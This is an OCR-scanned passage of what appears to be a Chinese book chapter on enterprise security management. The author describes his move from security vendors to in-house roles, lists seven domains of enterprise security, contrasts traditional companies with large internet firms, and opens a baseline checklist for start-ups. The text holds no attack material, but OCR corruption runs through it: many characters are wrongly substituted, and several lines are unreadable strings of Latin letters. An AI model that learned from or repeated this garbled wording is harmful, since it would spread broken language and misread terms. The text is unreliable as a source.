一 面 的 骨干 。 在 这 段 时 间 我 杀 里 经 历 了 从 乙方 到 甲 方 视角 的 过 渡 ， 从 零 
开始 建立 安全 体系 ， 真 正 把 乙方 玩 的 东西 在 一 家 甲 方 公司 落地 了 。 我 的 
方法 思路 过 程 跟 茶 些 互 联网 公司 不 太一 样 ， 因 为 那 时 候 BAT 的 安全 人 员 
大 多 是 毕业 后 直接 去 的 甲 方 ， 一 开始 就 做 甲 方 安全 ， 而 我 是 从 乙方 到 甲 
方 ， 所 以 实践 上 更 多 是 参考 了 乙方 的 方法 论 ， 再 目 己 摸 石头 过 河 ， 除 了 
攻防 之 外 ， 多 线 并 行 ， 直 接 建 立 较 完 整 的 安全 体系 。 




















后 来 在 安全 行业 不 太 景 气 的 那个 年 代 我 好 像 碰 到 了 安全 行业 的 天 人 花 


板 。 之 后 跟 在 “信息 安全 的 职业 生涯 ”一 文中 所 述 的 那样 ， 我 实践 了 里 面 
所 说 的 最 后 一 跳 ， 做 了 一 家 网 游 公司 的 技术 负责 人 ， 社 会 俗名 CTO， 由 
安全 转向 全 线 技 术 管理 。 说 实话 ， 在 这 段 时 间 里 我 并 不 是 特别 重视 安 

全 ， 一 方面 跟 目 己 是 安全 出 身 有 关 ， 另 一 方面 这 确实 是 位 置 决 定 想 法 的 
事情 ， 不 是 安全 不 重要 ， 而 是 有 很 多 事情 比 安全 更 重要 。 老 实说 ， 安 全 
这 个 事情 跟 金钱 关系 密切 ， 当 你 有 100 万 元 的 时 候 拿 出 2 万 元 买 个 保险 箱 
装 它们 你 觉得 值 ， 但 你 只 有 2 万 元 的 时 候 要 拿 出 8 千 元 买 保险 箱 ， 大 多 数 
人 都 会 不 愿意 。 可 参见 我 在 知 乎 上 回答 的 那个 问题 “为 什么 做 安全 一 
定 要 去 大 公司 ”。 我 鳃 以 为 很 多 公司 的 CEO、CTO 对 安全 的 认识 ， 翻 译 
过 来 应 该 是 : 被 黑 是 一 件 很 负面 的 事情 ， 所 以 找 个 人 筹建 团队 打包 了 ， 

只 要 不 出 事 就 行 。 他 们 不 是 真 的 认为 安全 非常 重要 ， 也 不 会 把 安全 当成 
一 种 莞 争 力 。 现 在 说 这 人 句 话 并 不 是 在 影射 过 去 ， 当 下 国内 很 多 企业 的 观 
念 仍 然 停留 在 这 个 水 平 上 。 















































之 后 我 去 360 经 历 了 短暂 的 时 光 ， 再 次 以 乙方 的 里 份 拜 访 了 企业 级 
客户 ， 很 偶然 地 发 现 大 多 数 乙方 安全 公司 的 顾问 或 工程 师 其 实 都 没有 企 
业 安 全 管理 的 真正 经 验 。 虽 不 能 把 这 些 直接 等 价 于 纸上谈兵 ， 不 过 确实 
是 乙方 的 软肋 。 在 甲 方 企业 高 层 的 眼中 ， 攻 防 这 档 子 事 可 以 等 价 于 我 花 
点 钱 让 安全 公司 派 几 个 工程 师 给 我 做 渗透 测试 然后 修复 漏洞 ， 不 像 大 型 
互联 网 公司 那样 上 升 为 系统 化 和 工程 化 的 日 常 性 活动 。 离 开 数字 公司 
后 ， 我 到 了 全 球 化 的 公司 (华为 从事 产品 线 安全 ， 负 责 两 朱云: 公有 
云 和 终端 云 。 产 品 线 安全 属于 甲 方 安全 ， 又 跟 很 多 甲 方 安全 不 太一 样 ， 











比 传统 意义 上 的 甲 方 安 全 介入 得 更 深 ,和 履 盖 率 更 高 的 DLC， 直 接 导 问 
产品 设计 的 源头 。 对 绝 大 多 数 甲 方 而 言 ， 你 也 许 在 用 OS 的 
Dep&ASLR， 也 许 在 用 各 种 容器 ， 但 你 很 少 会 自己 去 发 明 轮 子 ， 你 也 许 
会 目 己 造 一 个 WAF 这 样 的 工具 ， 但 你 可 能 很 少 会 像 微 软 那 样 要 上 自己 去 
搞 一 个 EMET 这 种 涉及 安全 机 制 层面 的 东西 。 但 在 产品 线 安 全 里 ， 
切 都 会 更 进一步 ， 不 只 是 像 互联 网 企业 那样 关注 入 侵 检测 、 漏 洞 扫描 
等 ， 而 是 从 设计 和 威胁 建 模 的 角度 去 看 整体 和 细节 的 安全 。 这 又 拓展 了 
我 从 R&D 的 视角 看 待 以 及 分 析 安 全 问题 的 眼界 。 因 此 ， 我 可 以 站 在 一 个 
较 全 面 、 客 观 、 中 立 的 立场 来 说 安全 ， 我 不 会 说 某 些 方式 属于 纸 上 谈 
也 不 会 把 攻防 捧 得 全 高 无 上 。 




















接 下 来 ， 切 入 本 章 正题 ， 企 业 安全 是 什么 ? 我 认为 它 可 以 概括 为 : 
从 广义 的 信息 安全 或 狭义 的 网 络 安全 出 发 ， 根 据 企 业 目 身 所 处 的 产业 地 
位 、 开 总 投入 能 力 、 商 业 模式 和 业务 需求 为 目标 ， 而 建立 的 安全 解决 方 
案 以 及 为 保证 方案 实践 的 有 效 性 而 进行 的 一 系列 系统 化 、 工 程 化 的 日 常 
安全 活动 的 集合 。 怎 么 感 党 有 点 咬 文 鄙 字 ? 实际 上 ， 这 里 面 的 每 一 个 项 
都 会 决定 你 的 安全 整体 方 采 是 什么 ， 哪 怕 同 是 中 国 互联 网 TOP10 中 的 公 
司 ， 安 全 需求 也 完全 不 一 样 。 











有 人 也 许 会 觉得 CSO 干 的 活 有 点 虚 ， 但 凡 偏 管 理 都 是 纸上谈兵 。 我 
不 直接 回答 这 个 问题 ， 我 只 举 一 个 例子 。 大 多 数 身 在 这 个 行业 的 人 都 知 
道 社 工 库 遍 地 都 是 ， 入 侵 者 甚至 站 在 了 大 数据 的 维度 ， 国 内 的 数据 库 绝 


大 多 数 除了 password 字 段 加 盐 值 存储 之 外 ， 其 余 信息 都 以 明文 保存 。 而 
在 欧美 等 地 隐私 保护 是 有 明确 的 法 律 规 定 的 ， 映 射 到 数据 持久 化 这 个 细 
节 ， 就 是 需要 满足 一 定 强度 以 上 的 加 密 算 法 加 密 存 储 。CSO 惑 是 需要 制 
定 这 些 荣 略 的 人 ， 难 道 说 这 些 都 是 形而上学 无 用 的 安全 措施 吗 ? 在 互联 
网 公司 ， 安 全 负责 人 会 较 多 地 介入 到 日 常 技术 性 活动 中 ， 但 随 痢 组 织 规 
模 的 扩大 和 行政 体系 的 加 深 ，CSO 不 再 可 能 像 白 帽子 一 样 专注 于 攻防 对 
抗 的 细节 ， 这 也 是 一 个 无 法 回避 的 现实 问题 。 是 不 是 一 定 要 说 出 诸如 

CSREF 时 匡 和 其 他 浏览 右 的 区 别 ， 才 算是 合格 的 CSO? 我 觉得 这 要 看 具 

体 场景 ， 对 于 国内 排名 TOP10 以 后 的 互联 网 企业 ， 我 觉得 这 个 要 求 也 许 
般 强 算 合理 范畴 ， 但 对 于 规模 非常 庞大 的 企业 而 言 ， 这 个 要 求 显 然 太 茄 
刻 了 ， 比 如 我 所 在 公司 ，CSO 属 于 法 务 类 职位 而 不 是 技术 类 职位 。 











不 想 当 将 军 的 士兵 不 是 好 士兵 ， 虽 然 有 人 想 走 纯 技术 路 线 ， 但 是 仍 
有 很 多 人 想 过 要 当 CSO。CSO 这 个 职位 跟 茶 些 大 牛 表 达 的 不 完全 一 致 ， 
所 以 下 面 的 篇 幅 会 继续 写 ， 至 少 在 技术 层面 ，CSO 不 会 只 停留 在 微观 对 
抗 上 ， 而 是 会 关注 系统 性 建设 更 多 一 点 。 至 于 跟 董 事 会 建立 沟通 桥梁 ， 
虽然 也 重要 ， 不 过 关注 的 人 就 更 少 了 ， 本 书 将 不 会 涉及 。 


1.2 企业 安全 包括 哪些 事情 


企业 安全 涵盖 7 大 领域 ， 如 下 所 示 : 


1) 网 络 安全 : 基础 、 狭 义 但 核心 的 部 分 ， 以 计算 机 PC、 服务 
器 、 小 型 机 、BYOD.……) 和 网 络 为 主体 的 网 络 安 全 ， 主 要 聚焦 在 纯 技 
术 层 面 。 


2) 平台 和 业务 安全 : 跟 所 在 行业 和 主 营业 务 相 关 的 安全 管理 ， 例 
如 有 反 欺 诈 ， 不 是 纯 技 术 层 面 的 内 容 ， 是 对 基础 安全 的 拓展 ， 目 的 性 比较 
强 ， 属 于 特定 领域 的 安全 ， 不 算 厂 义 安全 。 





D 广义 的 信息 安全 : 以 IT 为 核心 ， 包 括 广 义 上 的 “Information” 载 
体 : 除了 计算 机 数据 库 以 外 ， 还 有 包括 纸 质 文档 、 机 要 ， 市 场 战 略 规划 
等 经 营 管理 信息 、 客 户 隐私 、 内 部 邮件 、 会 议 内 容 、 运 营 数 据 、 第 三 方 
的 权益 信息 等 ， 但 几 你 想得到 的 都 在 其 中 ， 加 上 泛 “Technology” 的 大 安 
全 体系 。 











A) IT 风 险 管 理 、 开 审计 && 内 控 : 对 于 中 大 规模 的 海外 上 市 公司 而 
， 有 诸如 SOX-404 这 样 的 合 规 性 需求 ， 财 务 之 外 就 是 IT， 其 中 所 要 求 
的 在 流程 和 技术 方面 的 约束 性 条 款 跟 信息 安全 管理 重 攻 ， 属 于 外 围 和 相 
关 领 域 ， 而 信息 安全 管理 本 身 从 属于 开 风 险 管理 ， 是 CIO 视 角 下 的 一 个 


HI 








5) 业务 持续 性 管理 : BCM (Business Continuity Management) 不 
属于 以 上 任何 范畴 ， 但 又 跟 每 一 块 都 有 交集 ， 如 果 你 觉得 3) 和 4) AA 
虚 ， 那 么 BCM 绝 对 是 面向 实 操 的 领域 。 最 近 ， 有 网易 、 中 有 文 付 宝 、 
后 有 携程 ， 因 为 各 种 各 样 的 原因 业务 中 断 ， 损 失 巨 大 都 属于 BCM 的 范 
Be ABASH: 这 跟 安 全 有 什么 关系 ? 安全 是 影响 业务 中 断 的 很 大 一 部 
分 可 能 因素 ， 例 如 DDoS， 入 侵 导 致 必须 关闭 服务 自 检 ， 数 据 丢 失 ， 用 
户 隐 私 泄露 等 。 又 会 有 人 问 : 这 些 归 入 安全 管理 即 可 ， 为 什么 要 跟 
BCM 扯 上 关系 ， 做 安全 的 人 可 以 不 管 这 些 吗 ? 答案 自然 是 可 以 不 管 ， 
就 好 像 说 : “我 是 个 Java 程 序 员 ，JVM、dalvik (ART) 运行 原理 不 知道 
又 有 什么 关系 ， 完 全 不 影响 我 写 代 码 ! ”事实 上 ，BCM 提 供 了 另 一 种 更 
高 维度 、 更 完整 的 视角 来 看 待业 务 中 断 的 问题 。 对 于 安全 事件 ， 它 的 方 
法 论 也 比 单纯 的 ISMS 更 具有 可 操作 性 ， 对 业务 团队 更 有 亲和力 ， 因 为 
你 知道 任何 以 安全 团队 自我 为 中 心 的 安全 建设 都 难以 落地 ， 最 终 都 不 会 
做 得 很 好 。 

















6) 安全 品牌 营销 、 渠 道 维护 : CSO 有 时 候 要 做 一 些 务 虚 的 事情 ， 
例如 为 品牌 的 安全 形象 出 席 一 些 市 场 宣 介 ，Ppresentation。 驼 统一 点 讲 ， 
现在 SRC 的 活动 基本 也 属于 这 一 类 。 


7) CXO 们 的 其 他 需求 : 俗称 打杂 。 这 里 你 不 要 理解 为 让 安全 团队 
去 攻击 一 下 苋 争 对 手 的 企业 这 样 负面 铝 的 事情 ， 而 是 有 很 多 公司 需要 











做 ， 但 运 维 开 发 都 不 干 ， 干 不 了 或 者 不 适合 干 的 事情 ， 安 全 团队 能 力 强 
大 时 可 以 承包 下 来 的 部 分 ， 事 实 上 我 的 职业 生 讶 里 就 做 了 不 少 这 样 的 事 


情 。 





基础 的 网 络 安全 是 在 甲 方 的 绝 大 多 数 安全 团队 能 履 关 的 事情 ， 不 管 
你 的 安全 团队 能 力 如 何 ， 在 公司 里 有 无 影响 力 ， 这 个 是 必须 要 做 的 ， 因 
为 这 是 把 你 招 过 来 的 初 囊 。 再 往 后 的 发 展 ， 是 舍 止 于 此 则 看 个 人 的 想 
法 。 对 于 沉 醇 攻防 技术 的 人 ， 其 实 不 需要 往 后 发 展 了 ， 这 些 足 够 了 。 但 
如 果 你 的 安全 团队 富有 活力 和 想法 ， 即 便 你 想 止 于 此 他 们 也 不 干 ， 把 部 
门 做 大 做 强 是 这 些 人 的 愿望 ， 只 有 这 样 才 能 给 安全 团队 更 大 的 空间 。 这 
点 跟 乙 方 是 不 一 样 的 ， 对 于 乙方 而 言 ， 你 可 以 在 东 个 单 点 领域 上 无 限 深 
挖 ， 而 不 会 遇 到 天 花 板 ， 因 为 你 始终 是 在 满足 主 营业 务 的 需求 ， 即 使 你 
成 为 骨灰 级 的 专家 ， 公 司 也 会 对 你 在 茶 方 面 创新 有 所 期 符 而 给 你 持续 发 
展 的 可 能 性 。 但 是 在 甲 方 ， 安 全 不 是 主 营 业务 ， 归 根 结 底 ， 安 全 是 一 个 
保值 型 的 后 台 职 能 ， 不 是 一 个 明显 能 创造 收益 的 前 台 职 能 ， 是 一 个 成 本 
中 心 而 非 便利 中 心 。 安 全 成 本 的 大 小 跟 业 务 规 模 以 及 公司 便利 能 力 相 
关 ， 公 司 发 展 时 预算 和 人 员 编 制 都 会 增加 ， 业 务 俘 清 时 安全 做 得 再 好 也 
不 会 退 加 投入 ， 因 为 无 此 必要 。 反 面 的 例子 也 有 : 做 得 不 好 反而 奶 加 投 
入 的 ， 那 是 一 种 政治 技巧 而 非 现实 需要 。 在 乙方 ， 无 论 你 的 漏洞 控 气 技 
能 多 厉害 ， 公 司 都 不 会 跳出 来 说 “你 已 经 超出 我 们 需求 了 ， 你 还 是 去 更 
强大 的 公司 吧 ”( 通 常情 况 下 ) 。 但 是 在 甲 方 ， 假 设 是 在 一 个 国内 排名 
大 约 TOP5 以 后 的 互联 网 企业 ， 养 一 个 漏洞 挖掘 的 大 牛 也 会 令 人 很 奇 















































怪 ， 他 是 在 给 企业 创造 价值 还 是 在 目 絮 目 乐 是 会 受到 质疑 的 ，CSO 也 会 
被 质疑 是 否 伦 了 大 价钱 挖 来 的 人 不 是 出 于 业务 需要 而 是 用 于 扩大 目 己 团 
队 在 业内 影响 力 这 种 务虚 的 事 。 假 如 公司 到 了 Google 这 种 级 别 ， 有 一 大 
堆 产 品 ， 储 备 大 牛 则 是 顺利 成 章 的 ， 业 务 上 显然 是 有 这 种 需求 的 。 不 过 
还 要 看 产 出 是 人 否 对 主 营 业务 有 帮助 ， 工 作成 果 不 能 转化 为 主 营 业务 竞争 
力 的 答 试 性 活动 在 公司 有 钱 的 时 候 无 所 谓 ， 在 公司 收 紧 腰 带 时 则 其 存在 
MERA FX. 








以 狭义 的 安全 垂直 拓展 去 发 展 甲 方 安全 团队 的 思路 本 质 上 是 个 不 可 
控 的 想法 ， 筹 码 不 在 CSO 手 中 ， 甚 至 不 在 CTO 手 中 ， 而 是 看 主 营 业务 的 
崩 雨 表 ， 甲 方 安全 是 要 看 “ 脸 ” 的 ， 这 个 脸 还 不 是 指 路 部 门 沟通 合作 ， 而 
征 在 最 原始 的 需求 出 发 点 上 受 限于 他 们 。 因 此 有 想法 的 安全 团队 在 网 络 
安全 方面 做 得 比较 成 熟 时 会 转 同 平台 和 业务 安全 ， 平 台 和 业务 安全 是 一 
个 很 大 的 领域 ， 发 展 得 好 ， 安 全 团队 的 规模 会 扩大 2 倍 ，3 倍 ， 并 且 在 企 
业 价 值 链 中 的 地 位 会 逐渐 前 移 ， 成 为 运营 性 质 的 职能 ， 结 合 BCM 真 正 
成 为 一 个 和 运 维 、 开 发 并 四 齐 驱 的 大 职能 。 











BCM 在 很 多 人 了 眼 里 就 是 DR (Disaster Recovery， 灾 难 恢复 ) , DR 
其 实 只 是 BCM 中 的 一 个 点 ， 属 于 下 层 分 支 。 不 过 这 对 技术 领域 的 人 而 
言 是 最 直观 的 部 分 ，DR 在 互联 网 企业 里 由 基础 架构 部 门 或 运 维 主导 。 
不 过 强势 的 甲 方 安全 团队 其 实 也 是 能 参与 其 中 的 ， 而 BCP (Business 
Continuity Plan， 业 务 持续 性 计划 ) 中 的 很 大 一 部 分 跟 安 全 相关 ， 我 之 





前 也 主导 过 BCP&DRP (Disaster Recovery Plan， 灾 难 恢复 计划 ) ， 受 益 
于 绿 盟 那个 年 代 的 教育 不 只 是 攻防 ， 而 是 完整 的 信息 安全 和 风险 管理 。 
有 兴趣 的 读者 可 以 看 一 下 BS25999 (BCM 的 一 个 标准 ) 。 


广义 的 信息 安全 ， 比 较 直 观 的 映射 就 是 ISO2700x 系 列 ， 行 业 里 的 绝 
大 多 数 人 都 知道 TSO27001 和 BS7799， 这 里 就 不 展开 了 ， 对 真正 有 安全 
基础 的 人 而 言 ， 都 是 很 简单 的 东西 。 在 企业 里 能 否 做 到 广义 的 安全 ， 主 
要 看 安全 负责 人 和 安全 团队 在 公司 里 的 影响 力 ， 对 上 没有 影响 力 ， 没 有 
诠释 利害 关系 和 游说 的 能 力 ， 自 然 也 就 做 不 到 这 些 。 另 一 方面 ， 狭 义 安 
全 主要 对 接 运 维 开发 等 技术 面 公 司 同僚 ， 但 是 广义 安全 会 对 接 整 个 公司 
的 各 个 部 门 ， 对 于 沟通 面 的 挑战 来 说 ， 又 上 了 一 个 新 的 台阶 ， 在 我 看 来 
这 主要 取决 于 安全 的 领队 人 物 自己 拥有 什么 样 的 知识 结构 以 及 他 的 推动 
能 力 如 何 。 








在 企业 完全 涉及 的 7 大 领域 中 ， 对 于 第 4) 条 ， 如 果 你 所 在 的 组 织 有 
这 方面 的 需求 ， 安 全 职能 上 自然 也 会 参与 其 中 ， 是 否 刻 意 去 发 展 他 则 看 目 
己 需 求 ， 对 我 朋友 中 某 些 做 过 IT 治 理 和 风险 咨询 的 人 ， 相 信和 是 有 能 力 一 
并 吃 下 的 ， 如 果 是 技术 派 ， 不 建议 去 尝试 。 


第 6) 条 属于 水 到 渠 成 的 事情 ， 到 了 那 一 步 你 自然 需要 考虑 ， 束 算 
尔 不 想 ， 公 司 也 会 让 你 去 ， 就 像 我 现在 明明 做 技术 活 ， 却 也 不 知道 为 什 
么 会 跟 这 一 类 事情 挂 上 钩 。 


=~ 


第 7) 条 有 人 看 时 目 动 过 滤 了 ， 不 过 安全 负 贡 人 上 自身 是 否 有 瓶 祷 ， 
能 人 否 在 企业 里 发 展 起 来 跟 这 条 有 很 大 关系 ， 甚 全 有 很 多 从 1) 发 展 到 
2) 、3) 的 人 都 需要 借助 7) 这 个 渠道 ， 点 到 为 止 ， 不 多 说 了 。 











对 于 互联 网 公司 ， 我 建议 做 1) 、2) 、5) ; 对 于 传统 行业 ， 我 建 
议 做 1) 、3) 、4) 、5) 。 





在 互联 网 行业 ， 我 觉得 安全 工作 可 以 概括 为 以 下 儿 个 方面 : 


“信息 安全 管理 〈 设 计 流 程 、 整 体 策 略 等 ) ， 这 部 分 工作 约 占 总 量 


的 10%， 比 较 整体 ， 跨 度 大 ， 但 工作 量 不 多 。 





基础 架构 与 网 络 安全 : IDC、 生 产 网 络 的 各 种 链 路 和 设备 、 服 务 
器 、 大 量 的 服务 端 程序 和 中 间 件 ， 数 据 库 等 ， 偏 运 维 侧 ， 跟 漏洞 扫描 、 
打 补 本 、ACL、 安 全 配置 、 网 络 和 主机 入 侵 检 测 等 这 些 事情 相关 性 比较 
大 ， 约 占 不 到 30% 的 工作 量 。 


应 用 与 交付 安全 : 对 各 BG、 事 业 部 、 业 务 线 自 研 的 产品 进行 应 用 
层面 的 安全 评估 ， 代 码 审计 ， 渗 透 测 试 ， 代 码 框架 的 安全 功能 ， 应 用 层 
BG Kae, DLA AA Bw, JPA ASR RE, “GAN 
理 还 乱 ?， 大 部 分 甲 方 团 队 都 没有 足够 的 人 力 去 应 付 产 品 线 交 付 的 数量 
庞大 的 代码 ， 没 有 能 力 去 实践 完整 的 SDL， 这 部 分 是 当下 比较 有 挑战 的 
安全 业务 ， 整 体 比重 大 于 30%， 还 在 持续 增长 中 。 

















WARE: 上 面 提 到 的 2) ， 包 括 账号 安全 、 交 易 风 控 、 征 信 、 反 
MIRER, RER, Kbit RKE RAE, RERE 
监控 《内 容 信息 安全 ) 、 防 游戏 外 挂 、 打 击 黑色 产业 链 、 安 全 情报 等 ， 
古 在 “ 吃 饱 饭 * 之 后 “ 思 泽 欲 * 的 进 阶 雷 求 ， 在 基础 安全 问题 解决 之 后 ， 越 
来 越 受 到 重视 的 领域 。 整 体 约 占 30% 左 右 的 工作 量 ， 有 的 甚至 大 过 
50%。 这 里 也 已 经 纷纷 出 现 乙 方 的 创业 型 公司 试图 解决 这 些 痛 点 。 








对 整体 介绍 的 部 分 在 前 面 的 篇 幅 讲 得 比较 多 ， 主 要 目的 是 希望 “ 视 
野 ? 部 分 不 缩水 ， 这 些 概念 在 后 面 篇 幅 都 不 打算 再 展开 了 。 


1.3 ”互联 网 企业 和 传统 企业 在 安全 建设 中 的 区 别 


忆 体 来 看 ， 传 统 企业 偏重 管理 ， 有 人 说 是 “三 分 技术 ， 七 分 管理 ”; 
而 互联 网 企业 偏重 技术 ， 我 认为 前 面 那个 三 七 开 可 以 倒 过 来 。 其 实 这 种 
说 法 也 是 不 准确 的 ， 到 后 什 么 算 技 术 ， 什 么 算 管理 ， 这 些 都 没有 明确 的 
定义 。 安 全 领域 大 部 分 所 谓 管 理 不 过 是 组 织 拷 术 性 的 活动 而 已 ， 充 其 量 
叫 技术 管理 。 








先 说 一 下 传统 企业 和 互联 网 企业 在 安全 建设 需求 上 的 差异 。 


传统 企业 安全 问题 的 特征 如 下 : 


1) IT 资产 相对 固定 。 


2) 业务 变更 不 频繁 。 


3) 网 络 边 界 比较 固定 。 


4) IDC 规 模 不 会 很 大 ， 甚 至 没有 。 


5) 使 用 基于 传统 的 资产 威胁 脆弱 性 的 风险 管理 方法 论 加 上 购买 和 
WARME m GERIR) 通常 可 以 搞定 。 





大 型 互联 网 企业 需要 应 对 如 下 问题 : 


海量 IDC 和 海量 数据 。 


应 对 业务 的 频 楷 及 布 和 变更 。 


同时 架构 层面 需要 关注 : 高 性 能 、 高 可 用 性 、《 水 平 ) 扩展 性 、 
TCO (ROI) 。 





在 规模 不 大 的 互联 网 公司 ， 传 统 企业 的 风险 管理 方法 论 是 可 以 沿用 
的 。 但 在 大 型 互联 网 公司 ， 传 统 企业 的 方法 论 可 能 会 失效 ， 因 为 你 可 能 
连 基础 架构 上 跑 什 么 业务 都 搞 不 清 ， 想 理 清 所 有 系统 接口 间 的 调用 关系 
以 及 数据 流 去 检视 设计 风险 以 及 设置 细 粒 度 的 访问 控制 就 是 件 不 现实 的 
事情 。 产 品 线 极 多 时 ， 业 内 没有 任何 一 个 团队 敢 说 自己 有 能 力 文 持 全 产 
品 线 ， 对 于 高 速 发 展 的 业务 ， 当 你 理 清 了 你 想 要 的 时 ， 说 不 定 架 构 又 发 
生变 化 了 。 只 有 对 占 公 司 整体 营 收 比较 主要 的 以 及 培育 性 质 的 战略 级 的 
核心 业务 ， 才 有 必要 去 深入 调研 并 随 之 更 新 ， 其 他 的 主要 依靠 自动 化 手 


段 。 











1. 传 统 企业 的 安全 建设 


从 安全 建设 上 来 看 ， 传 统 企业 的 安全 建设 是 ， 在 边界 部 署 硬 件 防 火 
墙 、 IPS/IIDS、WAF、 商 业 扫 描 器 、 堡 垒 机 ， 在 服务 器 上 安装 防 病毒 软 
件 ， 集 成 各 种 设备 、 终 端的 安全 日 志 建 设 SOC， 当 然 购买 的 安全 硬件 设 





备 可 能 远 不 止 这 些 。 在 管理 手段 上 比较 重视 ISMS (信息 安全 管理 体 
R) 的 建设 ， 重 视 制 度 流程 、 重 视 审 计 ， 有 些 行 业 也 必须 做 等 级 保护 以 
及 满足 大 量 的 合 规 性 需求 。 





2. 互 联网 企业 的 安全 建设 


互联 网 可 分 为 生产 网 络 和 办 公 网 络 ， 即 便 最 近 Google 声 称 取消 内 网 
也 是 针对 办 公 网 络 而 非 生产 网 络 。 互 联网 行业 的 大 部 分 安全 建设 都 围绕 
生产 网 络 ， 而 办 公 网 络 的 安全 通常 只 占 整体 的 较 小 比重 。 但 是 东 些 传统 
企业 可 能 完全 没有 生产 网 络 而 只 有 办 公 网 络 ， 那 么 网 络 安全 也 就 变 成 办 
公 网 络 的 网 络 安全 。 但 我 推测 ， 随 看 社会 “互联 网 +” 进 程 的 加 速 ， 很 多 
传统 企业 也 会 有 自己 的 生产 网 络 ， 最 终 都 变 成 和 互联 网 公司 一 样 的 形 
态 。 所 以 对 于 那些 在 给 传统 企业 客户 提供 咨询 和 解决 方案 的 乙方 的 工程 
师 ， 如 果 不 学 习 互 联网 安全 ， 也 迟早 会 陷入 困境 。 











互联 网 企业 的 生产 网 络 中 ， 安 全 解决 方案 基本 上 都 是 以 攻防 为 驱动 
的 ， 怕 被 黑 、 怕 拖 库 、 怕 被 动 持 就 是 安全 建设 的 最 直接 的 驱动 力 。 互 联 
网 公司 基本 不 太 会 考虑 等 保 、 合 规 这 种 形 而 上 的 需求 ， 只 从 最 实际 的 角 
度 出 发 ， 这 一 点 是 比 传统 企业 更 务实 的 地 方 。 曾 遇 到 过 一 个 例子 ， 说 要 
在 服务 器 上 装 防 病毒 软件 ， 推 测 就 知道 是 传统 企业 的 思路 ， 不 是 没有 真 
正 实 践 过 互联 网 企业 安全 就 是 没 被 业务 线 挑战 过 。 在 大 型 互联 网 企业 ， 
仅 是 性 能 损耗 、 运 维 成 本 和 软件 成 本 这 几 条 就 能 分 分 钟 把 这 种 需求 干 











控 ， 更 不 用 进入 对 于 服务 器 防护 这 种 更 实际 的 话题 了。 很 多 标准 说 到 底 
hes) 商 参与 编写 ， 博 弈 并 达成 妥协 ， 有 利于 目 己 产品 销售 的 代言 白 
皮 书 ， 并 不 是 完全 站 在 建设 性 的 角度 的 ， 作 为 乙方 给 政 企 客户 写 解 决 方 
案 建 议 书 无 可 厚 非 ， 但 在 互联 网 公司 做 企业 安全 ， 生 搬 硬 套 东 些 标准 就 
会 阅 出 笑话 来 。 














3. 从 量变 到 质变 


对 于 超过 一 定 规模 的 大 型 互联 网 公司 ， 其 IT 建设 开始 进入 自己 发 明 
轮子 的 时 代 ， 安 全 解决 方案 开始 局 部 或 进入 全 部 自 研 的 时 代 。 例 如 不 会 
购买 硬件 防火 墙 ， 而 是 用 服务 器 +Netfilter 的 方式 自 建 ， 不 会 部 署 硬 件 
IDS/IPS， 而 是 用 其 他 方式 来 解决 这 个 问题 。 其 实 不 难 理解 ， 规 模 小 的 
时 候 买 台 硬 件 防 火 墙 放 在 最 前 面 ， 省 事 。 但 是 规模 大 了 ， 难 道 去 买 1000 
台 硬 防 放 在 IDC 机 房 ? 成 本 上 就 没 法 通过 批准 。 再 说 ， 基 于 分 布 式 系 统 
的 CAP 理 论 和 Map-Reduce 衍 生 的 一 系列 互联 网 架构 ， 本 质 上 都 具有 “无 
限 ” 的 扩展 能 力 ， 而 对 于 传统 的 硬件 盒子 式 的 解决 方案 ， 其 设计 大 多 源 
于 对 小 型 网 络 体系 架构 的 理解 ， 基 本 不 具备 扩展 能 力 ， 完 全 不 能 适应 大 
规模 的 互联 网 架构 。 在 这 种 情况 下 甲 方 安全 团队 自己 动手 去 打造 完全 国 
绕 目 呈 业务 的 解决 方案 也 就 成 必然 趋势 。 





4. 大 型 互联 网 企业 安全 建设 的 方法 论 








目 研 或 对 开源 软件 进行 二 次 开发 + 无 限 水 平 扩展 的 软件 架构 + 构建 于 


普通 中 低 问 硬件 之 上 《PC 服务 器 甚至 是 白 牌 ) + 大 数据 机 器 学 习 的 方 
式 ， 是 目前 大 型 互联 网 公司 用 来 应 对 业务 持续 性 增长 的 主流 安全 解决 方 
案 。 是 否 真 的 到 了 机 各 学 习 阶 段 这 个 有 扣 难 说 ， 但 是 安全 进入 大 数据 时 
代 则 是 肯定 的 。 


与 办 公 网 络 和 雇员 信息 安全 管理 相 比 ， 互 联网 公司 的 文化 比较 开 
放 ， 一 般 不 太 会 维持 激进 的 安全 政 集 (对 雇员 做 太 多 信息 安全 方面 的 管 
制 和 限制 ) ， 这 点 也 是 跟 传 统 企 业 兰 别 比 较 大 的 地 方 。 











也 有 一 些 灰色 地 带 ， 比 如 TCO 较 高 的 安全 方案 ， 一 开始 没 感觉 ， 但 
实质 是 吸毒 ， 随 看 IDC 的 规模 扩张 ， 安 全 的 成 本 越 来 越 大 ， 最 后 说 自己 
巨大 的 成 本 “ 毒 死 ”。 对 于 做 惯 传 统 行业 解决 方案 且 客 户 手 里 都 有 大 把 预 
算 的 顾问 来 说 ， 对 这 一 点 是 没 感觉 的 ， 几 千 万 元 的 安全 整体 方案 信 手 拓 
来 ， 但 是 放 到 互联 网 中 ， 一 旦 业务 规模 成 倍增 长 ， 这 些 方案 最 终 都 会 走 
入 死胡同 。 不 止 是 成 本 ， 如 果 不 能 做 到 兼顾 宿主 的 性 能 ， 安 全 架构 随 整 
个 业务 架构 水 平 扩 展 ， 保 证 高 可 用 性 ， 最 终 安全 措施 都 会 走 进 死 胡同 。 








以 安全 集成 为 目 身 职业 亮点 的 人 如 采 不 积极 学 习 ， 会 有 很 大 贬值 风 
险 ， 因 为 以 后 不 需要 推 硬件 盒子 式 的 解决 方案 了 ， 就 算 堆 也 不 再 是 原来 
的 堆 法 。 


1.4 不 同 规模 企业 的 安全 管理 
1. 创 业 型 公司 


对 于 创业 型 公司 而 言 ， 安 全 不 是 第 一 位 的 ， 我 在 唱 反 调 吗 ? 应 该 只 
是 大 实话 而 已 。 安 全 建设 的 需求 应 该 是 : 保障 最 基本 的 部 分 ， 追 求 最 
性 价 比 ， 不 求 大 而 全 ， 了 映射 到 技术 实现 应 该 是 做 如 下 事情 : 
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基本 的 补丁 管理 要 做 。 


漏洞 管理 要 做 。 


:L3~L7 的 基本 的 访问 控制 。 


“没有 弱 密 码 ， 管 好 密码 。 





:账号 认证 鉴 权 不 求 各 种 基于 条 件 的 高 大 上 的 实时 风 控 ， 但 求 基 本 
功能 到 位 。 


办公 网 络 做 到 统一 集中 管理 (100 人 以 上 规模 ) 和 企业 防 病毒 ， 几 
